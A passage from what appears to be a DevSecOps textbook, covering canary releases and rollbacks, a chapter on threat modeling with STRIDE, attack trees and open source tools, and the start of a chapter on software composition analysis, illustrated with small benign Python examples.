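A common way to implement the canary releases mentioned above is deterministic hash-based bucketing, so the same user always lands in the same group and only a small, stable slice of traffic sees the new version. This is a general pattern sketched under assumptions, not any specific vendor's implementation.

```python
import hashlib

def serves_canary(user_id: str, canary_percent: int) -> bool:
    """Deterministically assign a user to the canary group.

    Hashing gives a stable bucket in 0..99, so the same user always
    gets the same answer and roughly canary_percent% of users qualify.
    """
    digest = hashlib.sha256(user_id.encode()).hexdigest()
    bucket = int(digest, 16) % 100
    return bucket < canary_percent

# Route ~5% of a simulated user base to the new version.
users = [f"user-{i}" for i in range(1000)]
canary_users = [u for u in users if serves_canary(u, 5)]
```

If the canary misbehaves, setting the percentage to zero is the rollback; no one new is routed to the bad version.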

Rollback considerations
• Stateful services: For services that maintain state, such as databases, rolling back might be more complex. It's akin to trying to "unbake" a cake – not always straightforward.
• Zero-downtime rollbacks: Achieving a rollback without causing system downtime is the gold standard. It ensures users face minimal disruption. Tools such as Kubernetes provide mechanisms for this, rolling back versions without taking services offline.
• Communicate with stakeholders: If a rollback happens, especially in a customer-facing environment, clear communication is essential. Inform users about the issue, the decision to roll back, and any potential impacts.


Potential pitfalls
• Incomplete rollbacks: Sometimes, not everything gets rolled back correctly, leading to lingering issues. It's like trying to clean up spilled milk; you might think you've cleaned it all, but then you step in a puddle you missed.
• Over-reliance on rollbacks: While rollbacks are a safety net, they shouldn't be the primary strategy for handling software releases. Over-relying on them can lead to complacency in testing and validation procedures.
• Data loss or corruption: In cases where new deployments introduce changes to data structures, a rollback might result in data loss if not handled with caution.

The importance of a CI/CD pipeline
The CI/CD pipeline is an integral part of modern software development and deployment processes. CI/CD pipelines are more than just a modern best practice – they're an essential framework that empowers organizations to deliver high-quality software rapidly, efficiently, and reliably. As the tech landscape continues to evolve, the importance of CI/CD will only grow. Its importance is evident in several key areas:
• Faster release cycles:
‚ Why it matters: In the competitive world of software, being able to quickly and efficiently release new features, updates, or fixes can give companies a significant edge
‚ CI/CD effect: By automating testing and deployment processes, CI/CD allows for more frequent releases
• Increased quality and reliability:
‚ Why it matters: High-quality software enhances user satisfaction and trust.
‚ CI/CD effect: CI ensures that code is integrated regularly; paired with continuous testing, this catches bugs earlier in the development process, reducing the likelihood of defects reaching production.
• Reduced manual errors:
‚ Why it matters: Human error, especially in manual deployment processes, can lead to defects, outages, or security vulnerabilities
‚ CI/CD effect: Automation minimizes the chance of manual mistakes, ensuring consistent deployment processes


• Enhanced developer productivity:
‚ Why it matters: Developers should focus on what they do best – writing code. Manual, repetitive tasks can be a drain on their productivity and morale.
‚ CI/CD effect: By automating integration, testing, and deployment, developers can concentrate on coding, leading to faster development cycles and more innovation.
• Immediate feedback:
‚ Why it matters: Feedback is crucial for continuous improvement. The sooner issues are identified, the quicker they can be addressed.
‚ CI/CD effect: Continuous testing and monitoring provide immediate feedback on code changes, making it easier for developers to rectify issues.
• Cost-efficiency:
‚ Why it matters: Reducing the time and resources required for testing and deployment can lead to significant cost savings
‚ CI/CD effect: Automated pipelines reduce the need for manual intervention, lowering labor costs and speeding up development cycles
• Scalability:
‚ Why it matters: As software projects grow, the complexities associated with integration, testing, and deployment also increase.
‚ CI/CD effect: Scaling CI/CD pipelines is not just about handling larger code bases. It's also about handling more developers, more parallel tasks, and more complex workflows.
• Enhanced collaboration:
‚ Why it matters: Modern software development often involves multiple teams (frontend, backend, QA, and so on), and efficient collaboration between them is crucial
‚ CI/CD effect: CI/CD encourages a DevOps culture, where Dev and Ops teams collaborate more closely, leading to smoother development and deployment processes
• Rollbacks and risk mitigation:
‚ Why it matters: Sometimes, despite all precautions, issues make their way to production. Being able to address these efficiently is crucial.
‚ CI/CD effect: Automated deployment processes usually include provisions for quick rollbacks, allowing teams to revert to previous stable versions if problems arise.


• Consistency across environments:
‚ Why it matters: Discrepancies between development, staging, and production environments can lead to unexpected behavior.
‚ CI/CD effect: CI/CD ensures that the same processes are applied across all environments, reducing "it works on my machine" issues. It doesn't automatically eliminate environmental discrepancies. Proper containerization, configuration management, and environment parity practices are also essential.

Summary
CI/CD is not just about delivering the "best" version of software but about making the delivery process efficient, consistent, and reliable. It's about integrating continuously and deploying (or delivering) continuously. Its benefits include the following:
• Faster release cycles: New features and fixes can be delivered to users more quickly
• Improved quality and reliability: Automated testing reduces human error, ensuring that code is of high quality before it reaches users
• Enhanced productivity: Automating repetitive processes means developers can focus on writing code
• Rapid feedback: If there's an issue, developers find out immediately and can address it quickly
By automating the CI/CD pipeline, teams can ensure consistency and quality, release features more rapidly, address issues promptly, and reduce manual, error-prone tasks.
In the next chapter, we will cover threat modeling, understand its importance and benefits, and learn how to perform threat modeling and integrate it into DevSecOps.

7
Threat Modeling
Threat modeling involves examining applications through the eyes of an attacker to identify and highlight security flaws that could be exploited. This makes security a part of the culture, laying the groundwork for a DevSecOps workplace. Threat modeling also helps teams better understand each other's roles, objectives, and pain points, resulting in a more collaborative and understanding organization.
Threat modeling – identifying, evaluating, and addressing security threats to a system or application – is one of the most critical aspects of the Software Development Life Cycle (SDLC), as it helps surface and address security issues early in the development process. This chapter examines threat modeling, covering its definition, benefits, and function, along with the free and open source tools used for it.
We will cover the following topics in this chapter:
• What is threat modeling?
• The importance of threat modeling in the software development life cycle
• Why should we perform threat modeling?
• Threat modeling techniques
• Integrating threat modeling into DevSecOps
• Open source threat modeling tools

What is threat modeling?
Threat modeling allows us to identify, assess, and prioritize potential threats to a system or application. The idea behind threat modeling is to identify those areas in a system that are most vulnerable to attack, then determine the best ways to mitigate those vulnerabilities.
Threat modeling can be used for various systems and applications, including software, hardware, networks, and physical infrastructure. It can help identify threats from external and internal sources, such as malicious hackers, employees, or even natural disasters.


Threat modeling is a structured approach to identifying, assessing, and prioritizing potential security threats to a system or application. It is a proactive approach to security, allowing developers and security teams to identify and address security risks early in the SDLC.
Let's imagine a situation where a software development team was tasked with building a new e-commerce website for a client. The website was designed to handle sensitive customer information such as credit card numbers and personal identification data. The development team knew that security was a top priority and that any security breach could result in the loss of customer trust. Therefore, the team used threat modeling to identify and mitigate potential security risks. The team's threat modeling process was as follows:
1. Identify assets: The first step in the threat modeling process is to define the project's scope and what needs to be protected, from proprietary code and physical hardware to user credentials (usernames and passwords) and personal user information (addresses and payment details). The team identified the assets that needed to be protected: primarily, customer data, the website's code base, and the server hosting the website.
2. Create an architecture overview: Next, the team mapped out the website's components, data flows, and trust boundaries to understand where attacks could occur.
3. Identify threats: With the architectural understanding in hand, the team brainstormed potential threats using the STRIDE model (https://owasp.org/www-community/Threat_Modeling_Process#stride-threat--mitigation-techniques), which stands for spoofing, tampering, repudiation, information disclosure, denial of service, and elevation of privilege (an attack trees model can also be used here):
‚ Spoofing: An attacker might try to impersonate a legitimate user
‚ Tampering: Data being transferred from the client to the server might be intercepted and altered
‚ Repudiation: Users might claim they didn't perform a certain action when they actually did
‚ Information disclosure: Unprotected API endpoints might reveal sensitive user data
‚ Denial of service: The website might be flooded with requests, making it unavailable
‚ Elevation of privilege: An attacker might exploit a vulnerability to gain admin rights
The team identified several concrete threats this way, including SQL injection attacks, Cross-Site Scripting (XSS) attacks, and brute-force attacks on the login page.
4. Prioritize threats: Once the team identified potential threats, they assessed the likelihood and impact of each one. Not all threats carry the same level of risk, so the team prioritized them based on factors such as potential impact, likelihood, and the criticality of the associated asset. A probability and impact score was assigned to each threat, and the SQL injection and XSS attacks emerged as the most severe, requiring immediate attention.


5. Define countermeasures: The team then identified countermeasures to mitigate each identified and prioritized threat. They implemented security controls such as input validation, output encoding, and parameterized queries to prevent SQL injection and XSS attacks.
6. Review and repeat: After implementing the countermeasures, the team tested the system to verify that the security controls were adequate. They conducted penetration testing and vulnerability scanning to identify any remaining security risks.
Finally, the team deployed the website and monitored it for security breaches. They used security monitoring tools to detect unauthorized access attempts and indicators of malicious activity on the website.
Thanks to the threat modeling process, the development team identified and mitigated potential security risks early in the development process. The website was deployed with robust security controls, and no security breaches or incidents were reported after deployment. The client was satisfied with the security of their website, and the development team's reputation for security and trustworthiness was strengthened.
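The prioritization step of this process can be sketched as a simple likelihood-times-impact scoring. The 1-5 scales and the sample scores below are invented for illustration; formal schemes such as DREAD or CVSS are more rigorous ways to rank threats.

```python
# Toy threat register for the e-commerce example: score each threat by
# likelihood x impact, then sort so the riskiest items come first.
threats = [
    {"name": "SQL injection",     "likelihood": 4, "impact": 5},
    {"name": "XSS",               "likelihood": 4, "impact": 4},
    {"name": "Brute-force login", "likelihood": 3, "impact": 3},
]

for threat in threats:
    threat["risk"] = threat["likelihood"] * threat["impact"]

prioritized = sorted(threats, key=lambda t: t["risk"], reverse=True)
```

With these (illustrative) scores, SQL injection tops the list, matching the team's conclusion that it needed immediate attention.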

The importance of threat modeling in the software development lifecycle
Threat modeling is an essential process in the design and development of systems and applications to ensure they're secure and resilient against potential attacks. Threat modeling is a proactive approach to security: instead of waiting for vulnerabilities to be exploited or discovered, organizations can anticipate potential avenues of attack and take steps to mitigate those risks from the outset. Here's a recap of its importance:
• Early identification of threats: Threat modeling helps to identify security vulnerabilities at the design phase, long before the code is written or systems are deployed. Addressing vulnerabilities early can be more cost-effective and less disruptive than mitigating them after deployment.
• Informed decision-making: Threat modeling provides a systematic overview of the potential threats, allowing stakeholders to make informed decisions about security trade-offs, budget allocation, and risk acceptance.
• Promotes a security mindset: Integrating threat modeling into the development process ensures that security is considered from the outset, fostering a security-first culture within the organization.
• Documentation and communication: Threat models serve as a documented reference of potential threats and their mitigations. This documentation aids communication among diverse teams (e.g., development, security, and operations), ensuring everyone is on the same page regarding security considerations.
• Regulatory and compliance benefits: For industries where regulatory compliance is a concern, threat modeling can help demonstrate due diligence in identifying and mitigating security risks.


• Enhanced incident response: A well-documented threat model can aid in incident response. If a breach or security incident occurs, having a clear understanding of the system's threat landscape can guide and expedite the response process.
• Adaptable to changing threats: Threat modeling is not a one-time process. As systems evolve and new threats emerge, the threat model can be updated, ensuring the organization remains adaptive and prepared.
• Holistic view of security: While automated tools might catch specific vulnerabilities in code (such as a SQL injection flaw), threat modeling takes a holistic approach, looking at the entire system's architecture and potential weaknesses.
• Stakeholder involvement: It encourages collaboration between different stakeholders, such as developers, security experts, system architects, and business managers. This collaboration ensures a well-rounded view of threats and their potential business impact.

Why should we perform threat modeling?
Threat modeling is an essential step in the software development and system design process, focusing on foreseeing and addressing potential vulnerabilities. Performing threat modeling has a myriad of advantages, and here's why it should be integrated into the development life cycle:
• Proactive approach to security: Rather than taking a reactive stance and waiting for vulnerabilities to be discovered or exploited, threat modeling allows you to anticipate potential threats and address them in advance.
Example: Before deploying a web application, a threat model might identify that the application is susceptible to SQL injection. By catching this in the design phase, developers can write more secure code to prevent this well-known attack vector.
• Cost-efficient: Addressing security issues early in the design or development phase is significantly cheaper than dealing with breaches or vulnerabilities after deployment.
Example: If a major e-commerce platform experiences a data breach due to not having modeled and mitigated threats, the cost of damage control, brand reputation harm, and potential lawsuits can be astronomical compared to the resources needed for early-stage threat modeling.
• Informed decision-making: Threat modeling provides a systematic overview of potential threats, allowing stakeholders to make well-informed decisions about security trade-offs, resource allocation, and risk acceptance.
Example: When designing a cloud-based storage system, decision-makers might use threat modeling to decide whether the benefits of third-party integration outweigh the security risks.
• Holistic security viewpoint: Threat modeling provides a comprehensive view of the entire system or application, ensuring that security is addressed from a holistic standpoint and not just in isolated pockets.


Example: A smart home device company might use threat modeling to understand how compromising one device could affect the entire home ecosystem.
• Stakeholder communication: A well-documented threat model serves as a communicative tool, ensuring that developers, security teams, and business stakeholders are aligned on security priorities.
Example: A bank planning to release a new mobile banking feature can use threat models to communicate to board members the various threats and the steps taken to mitigate them.
• Regulatory compliance: For industries with stringent security requirements, threat modeling can demonstrate due diligence and help in ensuring compliance with regulatory standards.
Example: Healthcare providers, subject to regulations such as HIPAA, can use threat modeling to ensure the confidentiality, integrity, and availability of patient data.
• Improved incident response: Should a security incident occur, having a detailed threat model can help pinpoint vulnerabilities, understand attack vectors, and expedite remediation.
Example: In the case of a DDoS attack on an online service, prior threat modeling can provide insights into potential weak points and allow the application of pre-established mitigation strategies.

Threat modeling techniques
Threat modeling is the process of identifying, understanding, and addressing threats in a given system, application, or environment. It's a key component of secure design and the SDLC. Here's an overview of the primary threat modeling techniques:
Brainstorming:
• This is an informal technique where a group of stakeholders, ideally with diverse expertise, come together to discuss and identify potential threats to a system
• Strengths: Flexible; can produce creative and unexpected insights
• Limitations: As it is informal, it might miss certain threats or be biased based on the participants' knowledge
Attack trees:
• A hierarchical model that outlines potential attacks on a system
• Starts with a root, which is the ultimate goal of the attacker, branching down into various means to achieve that goal
• Strengths: Provides a visual and systematic way to identify potential attacks
• Limitations: Can become complex for large systems
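An attack tree can be represented as a nested structure whose root is the attacker's ultimate goal and whose leaves are concrete techniques. The tree below is invented purely for illustration; walking it enumerates the individual attack steps a defender needs to consider.

```python
# A small attack tree as nested dictionaries. The root is the attacker's
# goal; each branch is one way of achieving the parent goal.
attack_tree = {
    "goal": "Steal customer payment data",
    "children": [
        {
            "goal": "Compromise the web application",
            "children": [
                {"goal": "Exploit SQL injection", "children": []},
                {"goal": "Steal an admin session token", "children": []},
            ],
        },
        {
            "goal": "Compromise the database host",
            "children": [
                {"goal": "Use leaked SSH credentials", "children": []},
            ],
        },
    ],
}

def leaf_attacks(node):
    """Recursively collect the concrete attack steps (the tree's leaves)."""
    if not node["children"]:
        return [node["goal"]]
    leaves = []
    for child in node["children"]:
        leaves.extend(leaf_attacks(child))
    return leaves
```

Each leaf is a candidate for a mitigation, which is why the technique scales poorly for large systems: the number of leaves grows quickly.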


Data Flow Diagrams (DFDs):
• Graphical representations of how data moves through a system
• Elements include processes, data stores, data flows, and external entities
• Strengths: Visualizing the flow of data helps identify potential vulnerable points
• Limitations: Doesn't capture all types of threats; mainly focuses on data flow vulnerabilities
STRIDE model:
• STRIDE stands for spoofing, tampering, repudiation, information disclosure, denial of service, and elevation of privilege
• Used to categorize threats in a system
Let's examine an example of using STRIDE to develop a threat model for an online voting system:
‚ Spoofing:
 Threat: An attacker impersonates a legitimate voter to cast a vote
 Mitigation: Implement strong user authentication mechanisms, such as two-factor authentication
‚ Tampering:
 Threat: An attacker modifies the vote count
 Mitigation: Implement integrity checks and digital signatures to validate data
‚ Repudiation:
 Threat: A voter denies having cast a vote
 Mitigation: Implement robust logging and auditing mechanisms to track actions
‚ Information disclosure:
 Threat: An attacker gains unauthorized access to voters' personal data
 Mitigation: Encrypt sensitive data and limit data access to authorized personnel only
‚ Denial of service:
 Threat: Attackers overwhelm the voting system, making it unavailable
 Mitigation: Use scalable infrastructure, rate limiting, and distributed denial of service protection mechanisms


‚ Elevation of privilege:
 Threat: A normal user gains administrative rights and manipulates the system
 Mitigation: Implement proper user role management, segregate duties, and regularly review user permissions
These techniques can be used separately or in conjunction with each other to create a comprehensive threat model. The best approach often depends on the nature of the project, the team's expertise, and the specific risks associated with the system or application.
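The STRIDE walkthrough above can also be captured as a lightweight threat register, one entry per category, which keeps threats and their mitigations reviewable alongside the code. The structure below is an illustrative sketch populated with the voting-system example, not a standardized format.

```python
# STRIDE threat register for the online voting system: each category
# maps to the identified threat and its planned mitigation.
stride_register = {
    "Spoofing": {
        "threat": "Attacker impersonates a legitimate voter",
        "mitigation": "Strong authentication, such as two-factor",
    },
    "Tampering": {
        "threat": "Vote count modified in transit",
        "mitigation": "Integrity checks and digital signatures",
    },
    "Repudiation": {
        "threat": "Voter denies having cast a vote",
        "mitigation": "Robust logging and auditing",
    },
    "Information disclosure": {
        "threat": "Unauthorized access to voters' personal data",
        "mitigation": "Encryption and least-privilege access",
    },
    "Denial of service": {
        "threat": "Voting system flooded with requests",
        "mitigation": "Scalable infrastructure, rate limiting, DDoS protection",
    },
    "Elevation of privilege": {
        "threat": "Normal user gains administrative rights",
        "mitigation": "Role management and regular permission reviews",
    },
}

# A quick completeness check: every category should have a mitigation.
unmitigated = [c for c, e in stride_register.items() if not e["mitigation"]]
```

A register like this can be kept in version control and re-reviewed whenever the system changes.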

Integrating threat modeling into DevSecOps
Threat modeling is a critical practice that should be integrated seamlessly into the DevSecOps workflow to identify and mitigate security risks early in the SDLC. The following are the key phases of the SDLC and how threat modeling can be incorporated at each stage:
• Pre-development phase
• Design phase
• Development phase
• Testing phase
• Deployment phase
Let's look at what these phases involve in detail.

Pre-development phase
• Threat modeling kickoff: Before development starts, hold a threat modeling kickoff meeting involving cross-functional teams, including developers, security experts, architects, and business stakeholders. Discuss the scope of the project, identify potential threats, and set security objectives.
• Asset identification: Identify critical assets, data flows, and potential attack vectors for the application or system under development. This initial understanding lays the foundation for the subsequent threat modeling phases.
Example: In a web application development project, critical assets to be identified may include user authentication data, sensitive customer information, and payment processing functionalities.

Design phase
• Threat model creation: Create a threat model that outlines potential threats, attack vectors, and security controls for the application's design. Utilize threat modeling methodologies such as STRIDE or DREAD to categorize and assess threats.


• Attack surface analysis: Analyze the application's attack surface to identify entry points and potential vulnerabilities. Document the attack surface as diagrams or representations to visualize potential threats.
Example: For a mobile banking app, attack surface analysis in the design phase may identify potential threats such as data interception during transactions, insecure storage of user credentials, and unauthorized access to customer accounts.

Development phase
• Secure coding guidelines: Provide developers with secure coding guidelines based on the threat model findings. These guidelines should address common vulnerabilities and best practices for secure code development.
• Code reviews and static analysis: Incorporate security code reviews and static analysis tools into the development process to identify and fix security issues before the code is committed.
Example: Developers working on an e-commerce platform can follow secure coding practices to prevent common vulnerabilities such as SQL injection or XSS during the development phase.

Testing phase
• Dynamic Application Security Testing (DAST): Perform dynamic testing using tools such as ZAP or Burp Suite to simulate attacks and assess the application's security posture. DAST runs automated scans against QA environments that mirror what will ship to production, giving a realistic view of how an attacker would find issues in the live application.
• Penetration testing: Conduct penetration testing to simulate real-world attacks and validate the effectiveness of the security controls implemented.
Example: During testing, a penetration test may uncover a privilege escalation vulnerability that was not detected during development.

Deployment phase
• Security monitoring and incident response: Implement security monitoring and incident response capabilities to detect and respond to potential security incidents after deployment.
• Threat modeling updates: Threat models should be continually updated to reflect changes in the application or system and adapt to emerging threats.
Example: After deployment, monitoring tools could be used to detect a series of brute-force login attempts, prompting an incident response to mitigate the threat.


Open source threat modeling tools
There are a few open source threat modeling tools available that can help organizations identify, categorize, and address security threats in a systematic way. Here's an overview of a few notable ones:
• OWASP Threat Dragon (https://owasp.org/www-project-threat-dragon/)
Details: An online and desktop threat modeling tool from the Open Web Application Security Project (OWASP). It allows for the creation of threat models with drag-and-drop components.
Features:
‚ Supports both web-based and desktop-based environments
‚ Integrates with GitHub for versioning and storage
‚ Enables the creation of DFDs with a built-in threat and rule editor
Impact: Helps to identify security threats early in the design phase. By integrating with the SDLC, it allows for continuous threat modeling.
• Microsoft Threat Modeling Tool (https://learn.microsoft.com/en-us/azure/security/develop/threat-modeling-tool)
Details: Although not strictly open source, Microsoft's tool is freely available. It's designed to guide users through the process of identifying and categorizing potential security threats.
Features:
‚ Built-in templates for common architectures
‚ Integrates STRIDE categorization
‚ Offers guidance on mitigations
Impact: It promotes a structured approach to threat modeling and helps integrate security considerations into the SDLC.
• pytM (https://github.com/izar/pytm)
Details: A Pythonic framework for threat modeling, allowing the definition of systems and components with Python scripts.
Features:
‚ Script-based definitions allow for easy integration and automation
‚ Built-in data types that understand and prioritize common web application threats
Impact: pytM helps streamline threat modeling for teams familiar with Python and can be integrated into existing Python-based toolchains.
• SeaSponge (https://github.com/mozilla/seasponge)



Details: A graphical threat modeling tool produced as the outcome of an OWASP GSoC project. It allows users to create threat models using a graphical interface.
Features:
‚ Graphical interface for drawing and visualizing architectures
‚ Built-in threat intelligence system to suggest potential threats
Impact: Helps organizations visualize their systems and associated threats in an easy-to-digest manner.

How threat modeling tools help organizations
The choice of threat modeling tool will depend on the specific requirements, expertise, and preferences of the organization. Open source tools, in particular, have the advantage of being adaptable and can be tailored to suit specific needs. Some of the benefits for organizations of using threat modeling tools are as follows:
• Early threat detection: Threat modeling tools help organizations identify potential threats early in the design or development phase. This can reduce costs and risks by addressing vulnerabilities before they become larger issues.
• Knowledge sharing: These tools often come with built-in threat libraries or intelligence. This can be an invaluable resource for teams unfamiliar with all the potential threats they may face.
• Documentation: Having a documented threat model can serve as a reference for both development and security teams. It can help ensure that security considerations are consistently addressed across different projects and teams.
• Integration with the SDLC: By integrating threat modeling into the SDLC, organizations can promote a security culture and ensure that security considerations are not an afterthought.

Reasons some organizations don't use threat modeling
Threat modeling is a structured approach used by organizations to identify and address potential security threats and vulnerabilities in a system or application. While threat modeling is beneficial, not all organizations adopt it, for various reasons:
• Lack of awareness: Some organizations might not be aware of the benefits of threat modeling or may not have encountered significant security issues in the past that would prompt them to adopt such practices.
• Resource constraints: Threat modeling requires dedicated time, expertise, and sometimes tools. Smaller organizations or start-ups might prioritize other aspects of their business over investing in a thorough threat modeling process.


• Complexity: For large and complex systems, threat modeling can be an overwhelming task. Some organizations might feel that the effort required to model threats for such systems outweighs the benefits.

• Skill gaps: Effective threat modeling requires specialized skills and expertise. Organizations might lack personnel with the necessary training or experience to conduct it.
• Misplaced confidence: Some organizations might have an over-reliance on their existing security measures, believing that their current defenses are sufficient and that additional threat modeling is unnecessary.
• Cost concerns: Engaging in regular threat modeling might be seen as an additional cost, especially if external consultants or tools are required.
• Rapid development cycles: In environments where rapid development and deployment are prioritized, such as in some DevOps cultures, there might be a perception that threat modeling will slow down the process.
• Lack of standardized processes: Unlike other security practices, threat modeling doesn't have a one-size-fits-all approach. This can make it challenging for organizations to understand where to start or how to implement it effectively.
• Belief in perimeter defense: Some organizations might still adhere to the outdated belief that a strong perimeter defense, such as firewalls and intrusion detection systems, is sufficient to protect them from threats.
• Cultural barriers: In some organizational cultures, security might be seen as a hindrance to innovation or as a responsibility relegated only to the IT department.
• Regulatory compliance focus: Organizations might focus solely on meeting regulatory compliance requirements rather than adopting a comprehensive approach to security. If threat modeling isn't mandated by regulations, it might be overlooked.

Summary
Threat modeling is an essential part of the SDLC. It helps to identify potential security vulnerabilities early in the development process, allowing developers to address them before the system is deployed. By identifying and mitigating security risks, threat modeling can help to improve an organization's reputation for security and trustworthiness.
Let's quickly recap the importance of threat modeling:
• Future-proofing: Cyber threats are evolving rapidly. By incorporating threat modeling, you're not just addressing today's threats; you're also preparing for tomorrow's.
• Cost efficiency: It's exponentially more cost-effective to address vulnerabilities during the design phase than to patch them after deployment.



• Trust and reputation: In an age where data breaches are headline news, maintaining the trust of your customers and stakeholders is paramount.
• Compliance: Many industries have stringent regulatory requirements. Threat modeling can be the difference between compliance and costly penalties.
Every organization, irrespective of size, should consider the following steps:
• Educate and advocate: Ensure that your development, operations, and security teams understand the value and importance of threat modeling.
• Integrate from the start: Incorporate threat modeling into the earliest stages of your SDLC. It's not an add-on; it's a foundational process.
• Invest in tools and training: Leverage available open source or commercial threat modeling tools. Invest in training your teams to use them effectively.
• Regularly review and update: The digital landscape and threat environment are dynamic. Regularly revisit and revise your threat models to adapt to new risks.
• Foster collaboration: Break down silos. Encourage interdisciplinary collaboration between developers, security experts, and business stakeholders to ensure a comprehensive view of threats.
As software becomes increasingly integral to business operations and everyday life, its security should not be an afterthought. It's a critical business imperative. By integrating threat modeling into your software development process, you're not just building software; you're building trust, resilience, and a foundation for sustainable growth. Act now. Embrace threat modeling. Secure your organization's future.
In the next chapter, we will be covering software composition analysis.

8
Software Composition Analysis (SCA)
Third-party dependencies are one of the biggest concerns when we deal with code. An estimated 80% to 90% of software code consists of third-party dependencies or libraries (reference: https://snyk.io/reports/open-source-security). These dependencies come with their own issues and benefits. In this chapter, software composition analysis (SCA) and its uses will be discussed. We will also cover the free and open source tools surrounding SCA.
We will cover the following topics:
• What is SCA?
• The importance of SCA
• The benefits of SCA
• Detecting security flaws
• Discussing past breaches
• Open source SCA tools

What is SCA?
Imagine you're a chef preparing a large banquet. While you may grow some of your ingredients in your backyard garden (equivalent to the custom code you write), you're also sourcing many ingredients from various markets and suppliers (akin to third-party or open source components). Just as you'd want to ensure that every ingredient is fresh, free from contamination, and ethically sourced, in software you want to ensure every component is secure, updated, and compliant with licensing terms. Unlike in cooking, however, using outdated or vulnerable components in software can have severe outcomes.
SCA is like a dedicated quality assurance team that covers security and compliance for your software's ingredients. It ensures you're building your software with the most up-to-date, safest, and most compliant components available. This not only ensures a better end product but also saves you from potential headaches, be they security breaches or legal battles, down the road.


SCA is like having a dedicated team in your kitchen that checks the following:
• The freshness of your ingredients (ensuring software components are not outdated)
• If there have been any recalls or contamination warnings about them (identifying known vulnerabilities)
• The source and ethical implications of your ingredients (complying with licensing terms)

How does SCA work?
We'll continue with our chef analogy here:
1. Ingredient inventory:
‚ As you bring ingredients into your kitchen, the SCA team makes a detailed inventory
‚ In software terms, the SCA tool scans your software project to list all the third-party components and libraries you're using
2. Freshness check:
‚ The team checks the freshness date on every ingredient.
‚ In software, the SCA tool verifies if you're using the latest version of a component. Outdated components might have vulnerabilities that have been fixed in newer versions.
3. Health and safety check:
‚ The team consults a database of known food contaminations and recalls to ensure none of the ingredients are risky
‚ The SCA tool checks databases of known vulnerabilities, such as the National Vulnerability Database (NVD), to see if any of your software components have reported issues
4. Ethical and legal compliance:
‚ The team reviews the sourcing of each ingredient, ensuring it aligns with ethical standards and doesn't breach any usage conditions.
‚ The SCA tool checks the licenses of third-party components to ensure compliance. Some open source licenses have strict terms, and violating them can lead to legal complications.
5. Remedial recommendations:
‚ If the team finds a stale ingredient or one from a questionable source, they suggest replacements or actions to take.
‚ Similarly, the SCA tool doesn't just identify problems. It provides recommendations, such as updating a component to a safer version or replacing it with a more secure alternative.


6. Continuous monitoring:
‚ The team doesn't just check ingredients once. They continuously monitor supply chain news and updates.
‚ SCA tools also offer continuous monitoring, ensuring that if a vulnerability is discovered in the future in a component you're using, you're notified immediately.
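The workflow above can be sketched end to end with a toy inventory and vulnerability database. All package names, versions, and advisories here are invented for illustration; a real SCA tool would parse a lockfile or manifest and query feeds such as the NVD.

```python
# Hypothetical dependency inventory (name -> version in use)
INVENTORY = {"webframework": "2.1.0", "jsonlib": "1.4.2", "cryptoutils": "0.9.1"}

# Toy "vulnerability database": name -> (affected version, fixed version)
VULN_DB = {"jsonlib": ("1.4.2", "1.4.3"), "cryptoutils": ("0.9.1", "1.0.0")}

def scan(inventory, vuln_db):
    """Compare each dependency against the database and return
    remediation advice for every vulnerable component."""
    findings = []
    for name, version in inventory.items():
        if name in vuln_db and vuln_db[name][0] == version:
            affected, fixed = vuln_db[name]
            findings.append(f"{name} {affected} is vulnerable; upgrade to {fixed}")
    return findings

for line in scan(INVENTORY, VULN_DB):
    print(line)
```

Continuous monitoring then amounts to re-running this comparison whenever the vulnerability database gains new entries, even if the inventory itself hasn't changed.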

SCA tools and their functionalities
Software composition analysis tools are automated tools used to identify vulnerabilities in compiled binaries, third-party libraries, and components. SCA tools use a set of predefined rules and algorithms to scan the code and identify vulnerabilities that can be exploited by attackers:
• Component identification: SCA tools can identify open source and third-party components within software applications. This includes direct and transitive dependencies.
• Vulnerability detection: Scans software components against known vulnerability databases, such as the NVD, to highlight potential risks.
• License compliance: Detects the licenses associated with open source components to ensure compliance with an organization's licensing policies and to avoid potential legal complications.
• Dependency mapping: Visualizes the dependencies within the application to show how components are interconnected and to highlight potential areas of risk.
• Continuous monitoring: Continuously checks for new vulnerabilities or updates related to the open source components in a software application, often in real time or as new vulnerabilities are disclosed.
• Policy enforcement: Allows organizations to set policies around the usage of open source components based on factors such as vulnerability severity, license type, or outdated components. The tool can then enforce these policies during development or CI/CD processes.
• Remediation guidance: Provides actionable insights and recommendations on how to fix or mitigate identified vulnerabilities or license issues.
• Integration with development and CI/CD tools: Seamlessly integrates with popular development environments, build systems, and CI/CD pipelines, enabling developers to get feedback instantly.
• Historical tracking: Tracks the usage of components and vulnerabilities over time, which can benefit audit trails or understanding the evolution of a project's risk profile.
• Security reports and dashboards: Provides a centralized view of open source risks across projects, enabling security, legal, and development teams to make informed decisions.
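Policy enforcement, in particular, is easy to picture as code: check each component's license against an organizational denylist and fail the build if anything violates policy. The license names and components below are made-up examples, not a recommendation of which licenses to deny.

```python
# Hypothetical policy: licenses the organization refuses to ship with
DENIED_LICENSES = {"AGPL-3.0", "SSPL-1.0"}

COMPONENTS = [
    {"name": "fastparser", "license": "MIT"},
    {"name": "dbdriver", "license": "AGPL-3.0"},
]

def enforce_policy(components, denied):
    """Return the names of components whose license violates policy.
    A CI step would fail the build if this list is non-empty."""
    return [c["name"] for c in components if c["license"] in denied]

violations = enforce_policy(COMPONENTS, DENIED_LICENSES)
if violations:
    print("Policy violations:", violations)  # build would be failed here
```

Real tools apply the same idea with richer policies (severity thresholds, version age) and surface the result in the pipeline rather than a print statement.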


The importance of SCA
In the intricate and interwoven world of software development, SCA tools act as vigilant guardians and advisors. They ensure that the components you're weaving into your masterpiece are sound, safe, and compliant, helping to craft a final product that's not only functional but also secure and legally unassailable.
Imagine you're putting together a massive jigsaw puzzle. Each piece you add is a piece of code or a component you're using in your software project. Some of these puzzle pieces you craft yourself (your custom code), but many you get from various sets (open source libraries or third-party components) because why reinvent the wheel, right? Now, while using these pre-made pieces speeds things up and can bring in some fantastic artwork, there's a risk: what if some of these pieces have defects, are outdated, or come with conditions on their usage? This is where SCA tools come into play. Let's look at why they're crucial.
Vast landscape of open source components:
• Just like a massive jigsaw puzzle with thousands of pieces, today's software projects use a myriad of open source components.
• It's almost impossible to manually keep track of every component's origin, its vulnerabilities, or its licensing restrictions. SCA tools act as your organized puzzle assistant, letting you know whether a piece is flawed or fits with your picture.
Rapid discovery of vulnerabilities:
• New security vulnerabilities in open source components are discovered daily. Without SCA, it's like finding out way too late that one of your puzzle pieces is from a recalled batch with lead paint.
• SCA tools continuously monitor known vulnerability databases, ensuring you're alerted if a piece you're using (or plan to use) is problematic.
License compliance:
